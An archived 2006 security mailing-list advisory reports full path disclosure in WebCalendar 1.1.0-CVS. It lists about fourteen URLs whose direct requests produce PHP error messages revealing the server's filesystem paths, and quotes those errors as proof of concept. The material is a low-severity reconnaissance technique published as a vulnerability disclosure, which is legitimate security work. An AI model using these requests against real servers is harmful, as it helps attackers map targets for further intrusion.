Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Full path disclosure in Webcalendar 1.1.0-CVS

from [crasher] Network Security [Permanent Link]
Subject: Full path disclosure in Webcalendar 1.1.0-CVS
Date: Wed, 29 Mar 2006 13:58:55 +0700 

Full path disclosure in webcalendar

Author   : Rusydi Hasan M
a.k.a    : cR45H3R
Location : Indonesia, Cilacap
Date     : March,28th 2006
Version  : 1.1.0-CVS

--- (software description)

WebCalendar is a PHP application used to maintain a
calendar for one or more persons and for a variety of purposes.


--- (vulnerable)

an attacker can get the location of the root directory from
error message


--- (PoC)

1. in directory /includes/index.php

   http://[victim]/[webcal_dir]/includes

   Parse error: parse error, unexpected T_STRING in
   /var/www/html/webcalendar/includes/index.php on line 1

2  in directory /tests/add_duration_test.php and /tests/all_tests.php

   http://[victim]/[webcal_dir]/tests/add_duration_test.php

   Fatal error: Class testoffunctions: Cannot inherit from undefined class
unittestcase in
   /var/www/html/webcalendar/tests/add_duration_test.php on line 4

   http://[victim]/[webcal_dir]/tests/all_tests.php

   Warning: main(../../simpletest/unit_tester.php): failed to open stream: No
such file or
   directory in /var/www/html/webcalendar/tests/all_tests.php on line 6

   Fatal error: main(): Failed opening required
'../../simpletest/unit_tester.php'
   (include_path='.:/usr/lib/php/:/usr/share/pear/') in
    /var/www/html/webcalendar/tests/all_tests.php on line 6

3   in groups.php

   http://[victim]/[webcal_dir]/groups.php

   Fatal error: Call to undefined function: translate() in
/var/www/html/webcalendar/groups.php
   on line 5

4   in nonusers.php

   http://[victim]/[webcal_dir]/nonusers.php

   Fatal error: Call to undefined function: translate() in
   /var/www/html/webcalendar/nonusers.php on line 3

5   in /includes/settings.php

   http://[victim]/[webcal_dir]/includes/settings.php

   Parse error: parse error, unexpected ':' in
/var/www/html/webcalendar/includes/settings.php
   on line 3

6   in /includes/init.php

   http://[victim]/[webcal_dir]/includes/init.php

   Warning: main(includes/classes/WebCalendar.class): failed to open stream: No
such file or
   directory in /var/www/html/webcalendar/includes/init.php on line 46

   Fatal error: main(): Failed opening required
'includes/classes/WebCalendar.class'
   (include_path='.:/usr/lib/php/:/usr/share/pear/') in
   /var/www/html/webcalendar/includes/init.php on line 46

7   in /includes/settings.php.orig

   http://[victim]/[webcal_dir]/includes/settings.php.orig

   Parse error: parse error, unexpected ':' in
   /var/www/html/webcalendar/includes/settings.php.orig on line 21

8  in /includes/js/admin.php

   http://[victim]/[webcal_dir]/includes/js/admin.php

   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/admin.php on line 14

9  in /includes/js/edit_entry.php

   http://[victim]/[webcal_dir]/includes/js/edit_entry.php

   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/edit_entry.php on line 15

10 in /includes/js/edit_layer.php

   http://[victim]/[webcal_dir]/includes/js/edit_layer.php

   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/edit_layer.php on line 24

11 in /includes/js/export_import.php

   http://[victim]/[webcal_dir]/includes/js/export_import.php

   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/export_import.php on line 68

12 in /includes/js/popups.php

   http://[victim]/[webcal_dir]/includes/js/popups.php

   // You can copy/modify and distribute this code under the conditions // of
the GNU GENERAL
   PUBLIC LICENSE Version 2. // var ns4 // Are we using Netscape4? var ie4 //
Are we using
   Internet Explorer Version 4? var ie5 // Are we using Internet Explorer
Version 5 and up? var
   kon // Are we using KDE Konqueror? var x,y,winW,winH // Current help position
and main
   window size var idiv=null // Pointer to infodiv container var px="px" //
position suffix
   with "px" in some cases var popupW // width of popup var popupH // height of
popup var
   xoffset = 8 // popup distance from cursor x coordinate var yoffset = 12 //
popup distance
   from cursor y coordinate var followMe = 1 // allow popup to follow
cursor...turn off for
   better performance var maxwidth = 300 // maximum width of popup window
function
   nsfix(){setTimeout("window.onresize = rebrowse", 2000);} function
   rebrowse(){window.location.reload();} function infoinit(){
ns4=(document.layers)?true:false,
   ie4=(document.all)?true:false;
ie5=((ie4)&&((navigator.userAgent.indexOf('MSIE
   5')>0)||(navigator.userAgent.indexOf('MSIE 6')>0)))?true:false;
   kon=(navigator.userAgent.indexOf('konqueror')>0)?true:false;
x=0;y=0;winW=800;winH=600;
   idiv=null; if (followMe) { document.onmousemove = mousemove;
if(ns4&&document.captureEvents)
   document.captureEvents(Event.MOUSEMOVE); } // Workaround for just another
netscape bug: Fix
   browser confusion on resize // obviously conqueror has a similar problem :-(
if(ns4||kon){
   nsfix() } if(ns4) { px=""; } var entries =
document.getElementsBySelector("a.entry");
   entries = entries.concat(document.getElementsBySelector("a.layerentry"));
entries =
   entries.concat(document.getElementsBySelector("a.unapprovedentry")); for (var
i = 0; i <
   entries.length; i++) { entries[i].onmouseover = function(event) { show(event,
"eventinfo-" +
   this.id); window.status = "
   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/popups.php on line 57
                       ^
                       ^
                       |---------- the directory

13 in /includes/js/pref.php

   http://[victim]/[webcal_dir]/includes/js/pref.php

   0 ) colorErr = true; if ( ! validWorkHours ( form ) ) { err += "
   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/pref.php on line 29

14 in /includes/menu/index.php

   http://[victim]/[webcal_dir]/includes/menu

   Fatal error: Call to undefined function: access_is_enabled() in
   /var/www/html/webcalendar/includes/menu/index.php on line 24


--- (shoutz)

#k-elektronik
(fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
#e-c-h-o (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
anonymous, the day)
Ph03n1x,ghoz,r34d3r,spyoff,slackX,sakitjiwa,xnuxer
k-elektronik@googlegroups.com
newbie_hacker@yahoogroups.com
jasakom-perjuangan@yahoogroups.com

--- (special)

danurdara prama for the bandwidth B)
--- (contact)

 cR45H3R || http://www.kecoak.or.id || crasher@kecoak.or.id
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Full path disclosure in Webcalendar 1.1.0-CVS, crasher <=
Previous by Date:  Re: Cantv/Movilnet's Web SMS vulnerability., raven
Next by Date:  [Full-disclosure] [ GLSA 200603-26 ] bsd-games: Local privilege escalation in tetris-bsd, Stefan Cornelius
Previous by Thread:  PhxContacts <= 0.93.1 beta Multiple SQL injection & xss, dabdoub-mosikar
Next by Thread:  [Full-disclosure] [ GLSA 200603-26 ] bsd-games: Local privilege escalation in tetris-bsd, Stefan Cornelius
Indexes:  [Date] [Thread] [Top] [All Lists]